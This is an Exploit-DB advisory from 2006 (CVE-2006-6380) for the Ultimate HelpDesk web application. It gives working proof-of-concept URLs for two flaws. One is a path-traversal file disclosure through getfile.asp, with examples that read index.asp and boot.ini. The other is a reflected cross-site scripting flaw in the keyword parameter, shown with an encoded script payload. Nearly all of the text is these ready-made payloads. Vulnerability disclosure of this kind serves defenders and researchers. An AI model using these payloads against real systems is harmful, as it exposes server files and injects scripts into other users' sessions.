Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities

EDB-ID: 2881	CVE: 2006-6380	OSVDB-ID: 31729
Author: ajann	Published: 2006-12-01	Verified:
Exploit Code:	Vulnerable App: N/A

*******************************************************************************
# Title   :  Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author  :   ajann
# Contact :   :(
*******************************************************************************
Login Before Vulnerabilities.:
[[SOURCE]]]------------------------------------------------------
http://[target]/[path]//getfile.asp?filename=[SQL]
Example:
//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini
[[/SOURCE]]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
[[/XSS]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-01]

Comments

Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities

Rating

No comments so far